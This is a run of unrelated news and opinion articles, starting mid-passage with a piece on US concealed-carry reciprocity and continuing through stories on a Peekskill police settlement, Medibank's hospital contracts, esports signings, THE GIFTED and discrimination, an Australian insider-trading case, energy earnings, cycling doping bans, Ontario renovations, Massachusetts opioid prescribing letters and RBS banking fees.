In Madigan, the 7th Circuit held that the right to carry was fairly obviously implied by the Second Amendment and therefore that Illinois had to at least offer a permit of some type. Illinois' shall-issue carry law was passed soon after, preventing the issue from going to the Supreme Court. In Peruta (which was denied a writ of cert by the Supreme Court this year) the 9th Circuit held that while California's may-issue laws may involve strict scrutiny in granting a person a license, a person can technically get a license, meaning Second Amendment rights are respected.
As a result, concealed carry and also reciprocity could be considered matter of state policy and laws. As it stands, HR38 is likely to be challenged (and an injunction against national reciprocity issued) on those grounds.
At this point, you might think “well, all states take driver's licenses, so how could that be?” A driver's license is actually recognized voluntarily. The states have all agreed to recognize motor vehicle licenses without federal prompting; there is no legislation compelling any state to recognize a driver's license from another.
Then there's the issue of the bill getting past the Senate, which is not guaranteed. Both houses of Congress have been dogged by infighting and dysfunction for years. Currently, there are 52 Republicans, 46 Democrats and 2 Independents. Presuming all 52 Republicans vote for the bill, 8 Democrats need to cross the aisle to pass the bill. The task is not Herculean, but far from guaranteed, and that's after any revisions are made.
Should the bill be substantially altered, it must then go before a conference committee, wherein members of the Senate and House must agree on the bill before sending it to the President for signature.
So yes, this is a wonderful step towards national reciprocity. The law-abiding citizens of the United States should be able to carry in accordance with their Second Amendment rights without fear of arrest thanks to draconian restrictions by paternalistic elites that have the temerity to posit they act in our “best interests.” They don't, and never have.
But we have a long way to go before it becomes reality.
Click here to get your 1911 Pistol Shopping Guide.
Click here to get The Complete Concealed Carry Training Guide
Sam Hoober is Contributing Editor for AlienGearHolsters.com, a subsidiary of Hayden, ID, based Tedder Industries, where he writes about gun accessories, gun safety, open and concealed carry tips. Click here to visit aliengearholsters.com.
Peekskill police Sgt. Ray Henderlong, suspended a year ago when he was accused of lying to the FBI, continues to receive full pay and will be granted a disability retirement
Buy Photo Sgt. Ray Henderlong was suspended last March and has been out on an undisclosed disability since then. (Photo: File photo/The Journal News)Buy Photo Story Highlights Sgt. Ray Henderlong, who has not been criminally charged, is accused of lying to the FBI
The alleged lie concerns why Henderlong ordered another officer to stop a garbage truck
The traffic stop occurred five days before an FBI trash-hauling industry arrest sweep in the region
PEEKSKILL – A Peekskill police sergeant suspended a year ago when he was accused of lying to FBI agents and the chief and of failing to monitor sex offenders continues to receive full pay and will be granted a disability retirement under a settlement that's been criticized by Mayor Frank Catalina.
Sgt. Ray Henderlong was suspended last March and has been out on an undisclosed disability since then. He will receive his full $121,000 salary until the Aug. 25 retirement date agreed on with the city as part of a settlement that also drops all departmental charges against him.
That settlement, approved by City Manager Anthony Ruggiero, "did not come to the mayor or the (Common) council until it was a done deal, and I was very, very unhappy about it," Catalina said, adding that Ruggiero should not have paid lawyers who negotiated the agreement without consulting the council.
"I don't know if the settlement was justified," Catalina said. "What are the facts?"
A March 3, 2014, memo obtained by The Journal News informs Henderlong that he is suspended and lists numerous departmental charges of misconduct and incompetence.
The 55-year-old patrol sergeant and former department spokesman is accused of ordering another officer to stop a garbage truck on Jan. 11, 2013, "without a legitimate reason" five days before the FBI rounded up 30 people in the New York metro area on racketeering and extortion charges as part of an investigation into organized crime's influence on the trash hauling industry.
Three days after that stop, Henderlong was questioned by the FBI about it and was allegedly "untruthful," to both federal agents and Peekskill Police Chief Eric Johansen, saying that he ordered the stop based on a tip from a lawyer in court. The disciplinary charges say he ordered the stop at the behest of a contractor, but does not say why.
Johansen would not say why the traffic stop attracted the FBI's attention. A New York City FBI spokesman also would not comment or discuss whether Henderlong was "untruthful." No criminal charges were ever brought against the 18-year police veteran.
Henderlong, who in 2012 made a bid to become chief, denied the allegations, saying he was "fully cooperative" with the FBI and did not lie.
NEWSLETTERS Get the Breaking News newsletter delivered to your inbox We're sorry, but something went wrong Please try again soon, or contact Customer Service at 1-888-426-6388. Delivery: Varies Invalid email address Thank you! You're almost signed up for Breaking News Keep an eye out for an email to confirm your newsletter registration. More newsletters
He also denied other accusations listed in his suspension notice. Those charges include failing to inform the chief about a criminal investigation in which the victim was a city councilwoman; directing Peekskill detectives not to tell the chief about that and other investigations; and ignoring orders to monitor sex offenders living in the city.
The 12-page settlement, obtained through Freedom of Information request, bars Henderlong, Ruggiero, Johansen and other officials from making derogatory comments about any of the parties, and anyone who does can be fined $10,000. It also prevents Henderlong from applying for other jobs with the city or suing the city.
Lance Klein, whose law firm was paid $4,600 by the city to negotiate the settlement, said the city manager is not required to inform the mayor or Common Council of the agreement. He said the city charter gives the manager the power to hire and fire employees.
"The mayor has nothing to do with this case, nor does the city council," Klein said, adding that the city charter "doesn't give (the mayor) the authority to make these decisions."
Ruggiero, the city manager, resigned his $163,000 post in February and begins a new job as Beacon city manager in May. His replacement has not been named. Ruggiero did not return messages seeking comment.
Twitter: @leehiggins
Read or Share this story: http://lohud.us/1bFidgm
Win McNamee/Getty Images White House Press Secretary Sean Spicer said Tuesday that President Donald Trump wants the Senate GOP's healthcare bill to be compassionate, but he wouldn't say if the president has issues with the current form of the bill.
"The president clearly wants a bill that has heart in it," Spicer said. "He believes that healthcare is near and dear to so many families and individuals. He made it clear from the beginning that was one of his priorities and he hopes the Senate works through this bill as the House did. Any ideas are welcome to strengthen it, to make it more affordable, more accessible
The comments followed a report from CNBC's Eamon Javers that the president told a meeting of tech CEOs Monday that the Senate's version of a healthcare bill needs "more heart."
Trump also told a luncheon of GOP senators last week that the House's version of the American Health Care Act was "mean."
When pressed what if the "more heart" comments on Monday meant that Trump had issues with aspects of the Senate law, Spicer demurred.
"I'm not going to get into private discussions that he's had," Spicer said. "But, the more we can do to produce a bill as it goes through this process that achieves the president's goals, that's something we can all agree on."
Senate Republican leadership is finalizing the legislative text of the bill, and expects to have a vote on its by next Friday. According to reports, the bill could increase spending from the House version on things like tax credits to help people access insurance, but also make deeper cuts to the Medicaid program.
Spicer said he did not know if Trump had seen any legislative text of the bill, but did confirm the president had a discussion with Senate GOP leadership on Tuesday and said members of the administration were giving input on the bill.
The exact details of the healthcare legislation are unclear, as the bill has not been made public.
GRIEVING fathers will be left with an $8,500 medical bill when their partner dies during childbirth as the nation's largest health fund Medibank refuses to pay.
Medibank is asking private hospitals to sign a contract that stipulates the fund would not pay a cent when a mother dies during childbirth.
It is in addition to the newly privatised insurers plan to refuse payment for another 165 procedures it says are highly preventable adverse events that amount to hospital mistakes and misadventures.
If signed the contract could leave desperate partners and family of the dead woman with a bill for over $8,500 they will have to pay with no refund from their health fund.
Medibank revealed in January the average cost of having a baby in a private hospital had risen to $8,500, Calvary says if the mother is in intensive care before she dies the bill is $5,000 a day.
Australian Medical Association president Professor Brian Owler described the move as “offensive” in a speech to the National Press Club yesterday.
Medibank has included the clause in contracts it wants Canberra's main private hospitals owned by Catholic health group Calvary Health Care to sign.
It plans to roll the contracts out around the country as other hospital contracts come up for negotiation.
“While we are currently negotiating its inclusion in our contract with Calvary Health Care, we understand it is a common industry practice not to pay for this event,” Medibank said in a statement.
“On the rare and highly regrettable occasion that it does occur, it is not uncommon for hospitals to waive a charge to private health insurers,” the fund said.
It says the clause “has been an inclusion in the contracts Medibank has agreed with hospitals for some time,” the fund said yesterday
Calvary is refusing to sign the contract claiming it “won't be bullied with non-negotiable ultimatums by insurers with a large presence in the market”.
“If someone thinks that a financial incentive will motivate doctors, nurses or anyone else in a hospital to prevent maternal death any more than they desire to do so now, then they have no understanding of medicine or the people in it,” Professor Owler said.
The CEO of the Consumers Health Forum, Leanne Wells, said: “The suggestion that a health fund should be exempt from paying benefits in the event of a mother dying during childbirth is harsh and unreasonable.”
“It highlights the need for the development of a clinically-led, nationally-agreed register setting out those avoidable, adverse events where health funds would be exempt from paying benefits,” she said.
Under other clauses in Medibank's controversial contract the fund would not pay if a person was readmitted to hospital within 28 days of being discharged.
Calvary says this could catch out many critically ill patients dying from cancer and other terminal illnesses who would be forced back on the public system.
Private Healthcare Australia CEO, Dr Michael Armitage said Private Health Funds have a responsibility to their members to demand improved quality and safety measures in healthcare.
“Privately insured Australians want their Fund to advocate on their behalf,” he said in a stamenent.
“Funds pay more when their members are subjected to poor care than they do for optimal care, but it is the member who suffers most in this scenario. Everyone wins in the system that demands a certain level of quality and safety,” he said.
PHA is definitely not offering any view on the commercial realities of contracting between Medibank Private and Calvary.
PHA does support every initiative which rewards quality and safety being delivered for our members.
Medibank says it is “not afraid to say that we want to see preventable events eliminated from the healthcare system and one of the ways we seek to do this is through our contracts”.
Highly preventable adverse events Medicare won't pay for:
· If a member has surgery and requires a blood transfusion, but is given the wrong blood
· If a member has a knee replacement and develops a severe infection after the procedure eg, sepsis
· If a member has surgery and has a surgical implement left inside them
· If, during the course of surgery, a member has an accidental puncture or laceration
· If, during recovery, a member develops pressure sores after a procedure
. procedures involving the wrong patient or body part resulting in death or major permanent loss of function;
. suicide of a patient in an inpatient unit;
. intravascular gas embolism resulting in death or neurological damage;
. medication error leading to the death of a patient reasonably believed to be due to incorrect administration of drugs;
. maternal death or serious morbidity associated with labour or delivery; and
. infant discharged to the wrong family.
Highly Preventable Adverse Events acquired in hospital:
a) Stage III ulcer
b) Stage IV ulcer
c) Intracranial injury
d) Fracture neck of femur
e) Other Fractures
f) Urinary tract infection (catheter)
g) Surgical site infection
h) Blood Stream infection
i) Prosthesis associated infection
j) Post-operative haemorrhage and haematoma
k) Other surgical complications
l) Pulmonary embolism
m) Venous thrombosis
Paris Saint-Germain's eSports's inaugural League of Legends team will reportedly feature two former members of the Jin Air Green Wings, Na "Pilot" Woo-hyung and Jin "Blanc" Seong-min, according to ESPN Esports's Jacob Wolf.
Pilot, an AD carry, joined the Green Wings Falcons in November 2014 before they merged with Green Wings Stealth in 2015. Blanc joined the team in May 2015 as a substitute top laner under the name “Ham.” He began playing on the main roster in the 2016 summer season as a mid laner, sharing the role with Lee "Kuzan" Seong-hyeok.
According to Wolf, the two players left Jin Air privately earlier this month. Neither played with the team during the 2016 KeSPA Cup earlier in November. Though the Korean team made fourth in the LCK 2016 Spring Playoffs, they had a rougher time in the summer season, falling to seventh with a 19-26 game record and missing the playoffs. Pilot was a high point for the team, however, with a 4.4 KDA across 45 games in the summer regular season, good for fourth-best among LCK ADCs, and 74 percent kill participation.
Though their performance in the spring season allowed the Green Wings to compete in the 2016 Season Korea Regional Finals for a slot at Worlds, they lost 3-2 in the first round to the Afreeca Freecs. With the expiration of all of Jin Air's players on November 30, the team and its players are likely looking to make changes ahead of the 2017 season.
In October, Paris Saint-Germain announced the launch of their esports division with the acquisition of Team Huma's slot in the 2017 European Challenger Series Spring Split. The long-running French soccer team tapped retired Fnatic support Bora "YellOwStaR" Kim to head the division, though he will neither be playing with nor coaching the team.
While the team yet to officially announce any players on their EU CS team, In a Reddit AMA in October, YellOwStaR said the team was looking for two Korean players who could “lead by example.”
RELATED: PSG AMA: YellOwStaR hopes to fill out Challenger team with fresh talent and two Koreans
"When it comes down to players — to be original, I would like to work with 2 Korean players that would 'lead by example' and young players that are willing to prove themselves and make their own name on the scene," YellOwStaR said.
Sasha Erfanian is a news editor for theScore esports. Follow him on Twitter, it'll be great for his self-esteem.
FOX's new hit series THE GIFTED is giving us all sorts of X-Men comic book vibes. There is action, iconic mutants, and the subtle moral messages about discrimination X-Men is synonymous for. THE GIFTED is about the Strucker family, whose children have just discovered that they are mutants themselves. The series follows their new lives as mutants outrunning a hostile government.
THE GIFTED teaches its audience about discrimination and prejudice using characters people can easily root for. The series doesn't do this overtly, but it uses mutants to teach a moderate audience what marginalized people deal with in the face of discrimination. It isn't extraordinarily bold, but the subtle way THE GIFTED portrays these issues on screen is invaluable.
X-Men's Channeling the Civil Rights Era
X-Men creator Stan Lee credits the Civil Rights era as inspiration for the X-Men universe and some of its most famous mutants. Dr. Martin Luther King Jr. was the inspiration for Professor Charles Xavier, and Malcolm X was the inspiration for Magneto. The lives of historically oppressed people help create the storylines for the mutants in Marvel Comics. The more obvious example is Magneto's backstory as a Holocaust survivor. Furthermore, X-Men has taken on the experiences of what it is like to be black, gay, an immigrant, or a person of a different religion. The characters in THE GIFTED face discrimination from the government, and it is something that is still prevalent in reality.
In THE GIFTED, the Mutant Control Act makes it illegal for mutants to use their powers in public. The government arrest and prosecutes mutants if they use their powers, even if it is by accident. Mutant Control legislation keeps mutants from occupying public space by challenging their right to exist as mutants. Therefore laws like the Mutant Control Act in THE GIFTED openly discriminate against mutants. This is all too familiar with what our government is doing now marginalized communities.
In the United States today, the government still practices flagrant forms of discrimination. We can talk about how the Jeff Sessions justice department recently labeled black protestors as “Black Identity Extremists.” Or the House of Representatives lead by Republicans are trying to take away women's reproductive rights with intrusive legislation. However, the government's attempt to ban transgender people from public space by creating bathroom bills is the most flagrant.
How Our Government Plays A Role in Discrimination
Bathroom bills like North Carolina's HB2 bill signed into law by former Governor Pat McCrory (R) were designed to discriminate. The law requires transgendered people to use restrooms according to their biological sex instead of their gender identity. The problem with that law was that it put trans-men (men) in the women's restroom and trans-women (women) in the men's restroom.
North Carolina lawmakers wanted to “keep men out of women's restrooms.” The irony of their HB2 law is that it explicitly put trans-men, who are men, into women's restrooms by law. HB2 was the evil creation of conservative Republican lawmakers who want to erase transgendered people from the public space. By using the government, conservative Republicans tried to ban trans people from public life by subversively denying them human dignity in using a public restroom.
Oh wait, there's more! Our government is still trying to discriminate against American citizens. Just ask about how President Trump, the man-child who paints his face orange and occupies the White House, is trying to ban transgendered people from serving our military. Transgender people like Kristin Beck, the woman who was a member of SEAL Team 6, the unit that killed Osama bin Laden.
The wave of anti-trans laws and executive actions discriminating against transgendered people make it harder for them to exist in public places. If life were imitating art conservative Republicans took a cue from every villain from the X-Men comics.
Even Relatives Can Show Discriminatory Behavior
Early on in THE GIFTED's inaugural season, the show weaves in how discrimination works and who its perpetrators are. THE GIFTED checks off bigots, the government, and even family members as people who discriminate against mutants. Take one of the series leads, Marcos, for example.
In the early episodes, Marcos talks about the day he received his powers. It was the same day his parents threw him out of his home. This is a recurring theme in the X-Men canon. Families exile their own children just for being born a Mutant. This is all too familiar for LGBTQ youths who make up 40 percent of the homeless youth population.
According to the True Colors Fund, LGBTQ youth make up 7 percent of the general youth, but they account for 40 percent of all homeless youths in the United States. This is an equivalent to 640,000 young people of the 1.6 million youths experiencing homelessness.
Also the Williams Institute at UCLA reveals that 43 percent of LGBTQ youths are forced out by their parents because of their sexual orientation or gender identity. This is second to the same group running away because of their family's rejection of their sexual orientation or gender identity accounting for 46 percent.
It goes without saying that THE GIFTED does not highlight LGBTQ issues like teen homelessness explicitly. However, it does highlight the problem with teen homelessness which is a direct problem for LGBTQ youths. Parents kick out of their own children because they are born with a sexual orientation or gender identity that they don't agree with. This type of discrimination is why so many LGBTQ youths experience homelessness in the US.
THE GIFTED Reaches Out To MLK's Moderates
THE GIFTED does not openly deal with issues of sexism, racism, homophobia, or transphobia. The show doesn't outright champion racial equality or LGBTQ rights either. However, it does share our experiences of discrimination, racism, homophobia, and transphobia in a way that applies to everyone.
The show tells the audience what it is like to experience those issues but through the life a mutant. It goes back to the X-Men comics using mutants to get people understand what it is like to be Black, Gay, Transgendered, etc. without explicitly saying so. THE GIFTED is reaching out to the moderates on the fence about issues of race, religion, gender, gender identity, and sexuality.
THE GIFTED needs to reach out to the people that Dr. Martin Luther King Jr. called the white moderates. This series is not reaching out to the liberals and progressives who are already fighting for justice for all. It's not reaching out to the conservatives who pretend that we have already achieved equality after the Civil Rights Movement either. THE GIFTED reaches out to the people in the middle, the people who tend to stay neutral on issues that don't regard themselves.
These moderates serve as the quintessential tiebreaker when it comes to actual change in our society's social progress. They buy into the myth that with time things will eventually get better and we will have this broad-reaching equality. This is the same myth Martin Luther King Jr. dispels in his 1963 letter from a Birmingham Jail. King writes:
“Such an attitude stems from a tragic misconception of time, from the strangely irrational notion that there is something in the very flow of time that will inevitably cure all ills. Actually, time itself is neutral; it can be used either destructively or constructively. More and more I feel that the people of ill will have used time much more effectively than have the people of good will. We will have to repent in this generation not merely for the hateful words and actions of the bad people but for the appalling silence of the good people.”
In many respects, the inaction of moderates has been almost as consequential as those committing acts of discrimination. Their silence on issues of discrimination is the equivalent to consenting with the practice itself.
So here is where the THE GIFTED comes in. It does what the X-Men comics have always been good at, it reaches out to moderates. It is vital for moderates to experience a series like THE GIFTED because it should help them empathize with those who experience prejudice and discrimination first hand. Hopefully this show can inspire action too.
Why THE GIFTED's Subtle Take On Discrimination Is Important
I hope THE GIFTED continues to use characters like Blink, Polaris, and Eclipse to expose their audience to experiences of discrimination. Already THE GIFTED pulls from the experiences of historically oppressed people, such as the parallels between Marcos' backstory and homeless LBGT teens.
This works especially well in the politically polarizing climate today. The series takes away divisive subjects like race, sexuality, gender, and gender identity and replaces them with mutants. This makes discrimination easier to empathize with because the audience personalizes the discrimination their favorite characters are experiencing.
THE GIFTED uses characters people are emotionally invested in to make its audience understand how discrimination works against marginalized people. It also goes as far as to help its audience empathize with the experience. This is why this show is essential, and why its subtlety on important issues make it intelligent.
But Hartman and Curtis share an unhappy bond that casts a shadow over Curtis's domestic goings on. The same bond raises fundamental questions about the effectiveness of the Australian Securities and Investments Commission. Hartman was, after he gave up his $350,000-a-year salary, Las Vegas gambling trips and high-end cars, the model criminal, giving ASIC every assistance. He even told it about insider-trading related ''tipping'' offences the corporate regulator never would have known about. Hartman, who made $1.9 million in illicit profits, paid a high price for his belated honesty. He was sentenced to an extra 18 months in jail for the tipping, on top of the three years in jail from the standard insider trading charges.
(Hartman, whose non-parole period is three years, is appealing against the severity of his sentence.) Here is the problem for ASIC and Curtis: As made clear in Justice Peter McClellan's sentencing, Hartman was the insider trading ''tipper''; Curtis was the insider trading ''tippee''. To elaborate, Hartman as tipper is in jail for an extra 18 months for offences he first appeared in court about in April last year. Hartman is in jail for up to 18 months extra for confessing his crime. Curtis is in the social pages But Curtis as tippee - the recipient of the tips that Hartman made - has not faced any ASIC court action more than a year after Hartman was charged.
The judgment by Justice McClellan is eloquent about the involvement of Curtis. It reads (with ''Mr Hartman'' used to replace ''the offender''): ''During the interview Mr Hartman made admissions to passing inside information obtained during the course of his employment at Orion [Asset Management] to Mr Curtis. ''Mr Hartman communicated this inside information for the purpose of Mr Curtis using the information to acquire and thereafter dispose of … CFDs [contracts for difference]. ''Mr Curtis is a childhood friend of Mr Hartman, Mr Hartman and Mr Curtis have known each other since about 1998. ''Mr Hartman communicated the inside information to Mr Curtis during the period 23 May 2007 and June 2008.
''During this time Mr Hartman considered that he and Mr Curtis were best friends and were also working in the same industry … ''Over time, Mr Hartman and Mr Curtis discussed the idea of Mr Curtis trading in CFDs using inside information possessed by Mr Hartman about Orion's intended trading in the shares of entities listed on the Australian Securities Exchange. ''In his role as a securities dealer for Orion Mr Hartman would receive instructions to trade in certain equities … ''Once in possession of this inside information Mr Hartman would send a message via the mobile phone to Mr Curtis about what security to take out a CFD position in, whether to go long or short and how many CFDs to acquire. ''During the interview, Mr Hartman disclosed that he and Mr Curtis communicated with each other about Mr Curtis's trading in CFDs by using BlackBerry mobile phones, both of which had been purchased by Mr Curtis.
''Mr Hartman later provided his BlackBerry to ASIC. The purpose of communicating using the BlackBerry was so Mr Hartman and Mr Curtis could use a method of transmitting messages that did not leave data on telecommunication services … ''After the first text message from Mr Hartman, Mr Curtis would normally respond with a message to the effect that he had traded in CFDs, had partially traded in CFDs or was unable to trade. ''In this regard Mr Curtis would send messages like 'can't do it', 'done' or 'unfinished' … ''During the period in which Mr Hartman was conducting the share trading on behalf of Orion, Mr Hartman and Mr Curtis would sometimes send messages to each other like, 'wow the price is going up'. ''Once Mr Hartman was sure that his trading on behalf of Orion was nearing completion he would send Mr Curtis another message in words to the effect of 'sell x', 'get out of x', x being the entity in which Mr Curtis was presently holding CFDs …
''Mr Hartman was asked during the interview if Mr Curtis knew the information was from Orion and Mr Hartman said 'yes'. ''Mr Hartman was asked if Mr Curtis knew the information was confidential and again Mr Hartman said 'yes'.'' The long period since Hartman's charges arose can be taken as raising questions about the competence of the corporate regulator. On a different reading, the tie between the two men may demonstrate how hard it is for ASIC to prosecute complex cases related to insider trading. In any event, the current situation is untenable. It allows the perception of one rule for Hartman and another rule for Curtis.
Hartman is in jail for up to 18 months extra for confessing his crime. Curtis is in the social pages.
Time to take a look at how energy companies did this quarter, now that the bulk of the earnings season is behind us.
Oil and gas exploration and production companies posted lower profits per barrel in the first quarter compared with the year-ago quarter, but net income per barrel was slightly better compared with the fourth quarter.
Refiners had a better showing — their net profit per barrel in the first quarter was more than double that metric in the first quarter of last year and slightly higher than the fourth quarter of 2012.
The analysis is from Barclays, which also said oil and gas production at the “super majors” declined 8% year-on-year. Total production was down 6%, but only 1% if one excludes BP, which sold its stakes in a Russian joint venture, BP TNK, in a deal with Russia's Rosneft completed in March.
Barclays “super majors” list includes Exxon Mobil Corp. /quotes/zigman/203975 /quotes/nls/xom XOM , Chevron Corp. /quotes/zigman/289939 /quotes/nls/cvx CVX , and ConocoPhillips /quotes/zigman/294662 /quotes/nls/cop COP , and European oil companies such as Royal Dutch Shell PLC /quotes/zigman/379078 /quotes/nls/rds.a RDSA and BP PLC /quotes/zigman/247026 /quotes/nls/bp BP . The merely “major” includes the likes of Hess Corp. /quotes/zigman/417764 /quotes/nls/hes HES , Canada's Suncor Corp. /quotes/zigman/43692 /quotes/nls/su SU , and Marathon Oil Corp. /quotes/zigman/292008 /quotes/nls/mro MRO , according to Barclays.
Per-barrel net income for exploration and production companies in the first quarter was $18.2, compared with $17 per barrel of oil equivalent (BOE) in the fourth quarter of last year and $20.3 BOE a year ago, Barclays said.
First-quarter per-share earnings for the majors decreased 6.3% year-on-year, the bank said in a note to clients.
Refiners, however, saw a net profit of $3.80 a barrel in the quarter, compared with $3.40 a barrel in the fourth quarter and $1.80 a barrel a year ago.
Looking a bit forward, Barclays said North America “remains a key focus” for the integrated oil companies, and investors should expect the companies to keep shucking non-core assets.
All told, U.S. oil production was up nearly 2% from the first quarter of 2012.
“Moving forward, we believe companies with a North America integrated business model will fare better than peers” thanks to continued differences in crude prices in the next several years, the bank said.
Refiners, meanwhile, “could comfortably double their regular dividend payout on average, which would support further upward revaluation of the sector, in our view.”
Follow Claudia Assis on Twitter @ClaudiaAssisMW
Follow Energy Ticker on Twitter @EnergyTicker
Androni Giocattoli-Sidermec manager Gianni Savio has reacted to the announcement that the UCI's disciplinary commission has dismissed the team's appeal against a month-long suspension, saying that he is ‘bewildered' by the ruling.
Savio's team was suspended from August 1 to 31 due to the positive tests of Davide Appollonio and Fabio Taborre, who were caught using EPO and FG-4592 respectively.
Under UCI article 7.12.1, teams with two positives – other than those for specified substances – will face suspensions between 15 and 45 days. The UCI's disciplinary commission applied a ban of 30 days.
Savio said that the team had only appealed against the suspension as a matter of principle, as the squad had accepted a similar suspension from the anti-doping group MPCC.
However he outlined a number of preventative measures that he said proved that the team couldn't have done any more to prevent doping.
He said these measures including anti-doping seminars where the medical/sports aspects and criminal implications of doping were outlined, an internal regulation all riders had to sign against doping, which accepted the payment of a large fine if they were found to be positive, plus the requirement that all riders had to give their passwords to their biological passports so that the team doctors could monitor the values.
He also said that the team didn't apply a ‘results at all cost' approach, but rather provided support to the riders via the sporting directors and the coaches. Finally, he added that the riders' performances were all monitored by the Selfloops platform, and that all of the riders – even Appollonio and Taborre – showed normal values.
“Not surprisingly, even the [disciplinary] commission explained and highlighted the measures described and noted that, ‘the decision to dismiss the appeal cannot be interpreted as a statement that the team would not take measures reasonably adequate to prevent violations,'” said Savio.
“Moreover, they added, ‘the decision to dismiss the appeal cannot be interpreted as a finding of involvement of one or more members of the team.'
He said that the team would have had to prove the unprovable in order to avoid the sanction that was handed down.
Meanwhile the team announced the dates that Taborre and Appollonio will face their first hearing in the Italian courts. Androni Giocattoli-Sidermec riders are required to sign a commitment not to dope and to accept a potential penalty of 100,000 euro if this rule is broken.
The team is suing both riders for that amount.
Appollinio will appear before judge Dr. Giunti in Lucca on March 18, while Taborre's trial will take place before a Dr. Di Donato in Turin on March 22.
“It is a historic turning point in the fight against doping,” claimed the team, “because the two cases are, in the history of cycling, the first judicial initiative taken by all the members of a team against two former athletes of the same group.”
Aging Canadian homeowners are increasingly deciding to stay where they are and renovate instead, especially since more adult children are still living under their roof.
That was one of the conclusions of a CMHC report on Ontario's housing market Tuesday, which looked at the booming market for home renovations.
Ontarians spent an estimated $25 billion on renovations last year, a figure that the housing agency says is forecast to keep increasing in the coming years. That's because the housing market itself is booming, and most buyers typically undergo some sort of renovation job within the first 12 months after they buy, indicate numbers by the Canada Mortgage and Housing Corporation.
Even more choose to improve their homes later, once the high costs of buying a new home are considered.
According to the latest Statistics Canada data, some of the more popular reno jobs include:
Basement upgrades.
Painting and wallpapering.
Heating and air conditioning.
Landscaping.
On the whole, Ontario's housing stock is aging. Roughly 57 per cent of all the homes in the province have been constructed since 1980, and those almost 40-year-old homes are in need of a few licks of paint — or more.
The trend is even more the case in rental units, where landowners can get around limits on rent hikes by spending money to improve their units' quality. "Existing homeowners and landlords looking to sell or rent existing space have undertaken more renovation work," the CMHC says.
But even aging homeowners who aren't renting out their homes to strangers are getting in on the trend.
Census data suggests roughly 80 per cent of homeowners over 55 years old don't want to move, and prefer to age in place in their existing homes. That's because "households only move if health and finances necessitate this or to be closer to family and friends," the CMHC says, adding that high real estate transaction fees are also a disincentive to moving.
So is having to make space for grown children at home. A recent Statistics Canada report found young people between 18 and 35 are more likely to be still living at home than they are to be in any other living arrangement — the first time in history that has been the case.
It's hard to downsize out of the family home if the nest isn't quite empty yet, the CMHC says.
"With a large share of young adults staying home longer due to economic and academic considerations, the need for space will remain important."
Within the province, the CMHC report says it expects southwestern Ontario to see even higher reno work in the coming years, due to a "combination of relatively higher than average employment, higher housing affordability levels, higher than average median age and continued pent-up demand based."
The Greater Toronto Area, however, is on track for a slowdown in renovations as an expected slowdown in the resale market "could dampen home price increases and in turn the incentive and confidence to invest in upgrades," CMHC says.
It seemed like a good idea.
Last March, the state Department of Public Health sent a confidential letter to every health care provider who prescribes opioids and other controlled substances, showing how each practitioner's prescribing practices compared with those of his or her peers.
Presumably, those who were writing too many prescriptions would see the error of their ways and scale back.
Advertisement
But an article in Thursday's New England Journal of Medicine concludes that the letter probably didn't work. In the 12 weeks after it was sent, an analysis of prescribing by 284 primary care physicians found no change from the previous 12 weeks.
Get Metro Headlines in your inbox: The 10 top local news stories from metro Boston and around New England delivered daily. Sign Up Thank you for signing up! Sign up for more newsletters here
This points to a costly failure to evaluate government responses to health issues, said the lead author, Dr. Michael Barnett, who researches health care delivery and quality at the Harvard T.H. Chan School of Public Health. The letters were required by the sweeping state law intended to control opioid use, signed amid fanfare by Governor Charlie Baker in 2016.
“As a researcher, I am continually amazed at the pace of policy-making that just kind of races ahead of any kind of evaluation or monitoring, even when it's not hard to do so,” Barnett said. The analysis was included in an opinion piece calling for collaboration between researchers and public officials.
But Dr. Monica Bharel, the state public health commissioner, said Barnett and colleagues were taking an overly narrow view of the letter's purpose and results. The letter was merely intended to give prescribers objective information that they can incorporate into their clinical judgment, she said.
“This letter was a small component of our overall plan of how to work with prescribers to address this current opioid epidemic,” Bharel said. The state's programs cannot be judged in isolation, she said. An array of efforts — including a requirement that prescribers consult a database that can alert them to doctor-shopping by patients — has led to a 29 percent decline in opioid prescribing since 2015, she said.
Advertisement
Bharel said she wouldn't necessarily expect to see a drop-off in prescribing during the 12-week period that the researchers examined. She also questioned whether any conclusions can be drawn from 284 doctors, when the letters went out to 29,000 physicians, advanced practice nurses, physician assistants, and dentists.
Prescribing practices have been a focus in efforts to fight the addiction epidemic that claimed more than 2,000 lives in Massachusetts last year.
Barnett, who works part-time as an internist, was inspired to do the analysis after he received one of the health department's letters.
The data showed that his volume of prescriptions was slightly below the median for other internists in the state. But the letter didn't tell him why the state was providing the information or what health officials wanted him to do with it. It offered no advice on how much he should prescribe. He didn't know what to make of it.
Talking to other doctors, including one whose prescribing was well above the median, Barnett found the reaction to the letter was “a collective shrug.”
Advertisement
A better approach, he said, would be to offer positive examples to emulate, rather than comparing doctors with an average or median.
“You really want to leverage the physician's internal motivation to be the A student,” he said. But in the case of opioid prescribing, the optimal rate is unclear.
To conduct the analysis, Barnett teamed up with athenahealth, a Watertown-based company that provides electronic health records to many physicians. As a result, athenahealth can see what happens at each doctor visit, and the company is eager to aggregate this information to learn about trends in medical care.
Barnett and researchers from athenahealth decided to look at primary care doctors because, as a group, they prescribe the biggest volume of opioids, and they also represent a large proportion of athenahealth customers.
The athenahealth researchers compiled the number of doctor visits that resulted in opioid prescriptions during the 12 weeks before and after the letters were sent. The data included 284 doctors in Massachusetts and 864 in eight other states in the Northeast. They found no changes over time, and no differences between the two groups. They also found no reductions in opioid prescribing by the highest-volume prescribers.
Dr. Andrew Kolodny, codirector of Opioid Policy Research at Brandeis University's Heller School for Social Policy and Management, was not involved in the research but agreed with the article's message. “These urgent public health efforts need to be evaluated. They're basically shooting in the dark,” Kolodny said. “I don't blame anyone in the midst of an emergency for trying things . . . but you should simultaneously be evaluating what you're doing.”
Felice J. Freyer can be reached at felice.freyer@globe.com
The end of free banking for customers is probably only a matter of time, with direct charges for current accounts almost inevitable, according to the chief executive of the Royal Bank of Scotland.
In an interview with The Telegraph , Ross McEwan warned that the end of free-if-in-credit banking was coming as it would lead to greater transparency about how banks funded themselves. He made clear, though, he had no plans to begin phasing out free accounts at the moment.
Mr McEwan, who last week announced the abandonment of so-called “teaser rates” on all RBS products, said paid-for accounts would be “addressed in the marketplace”.
“I think that's where it's going to end up longer term in this industry, as customers realise they are going to pay for it [current accounts] in some shape or form,” he said.
“It's around transparency. If that's the most transparent way of doing it, the industry will end up there.”
Last week, Mr McEwan set out his turnaround plans for RBS as the taxpayer-backed lender reported an £8.2bn loss for 2013. It was the bank's sixth consecutive annual loss, taking the lender's cumulative losses since its £45.5bn bailout in 2008 to just over £46bn.
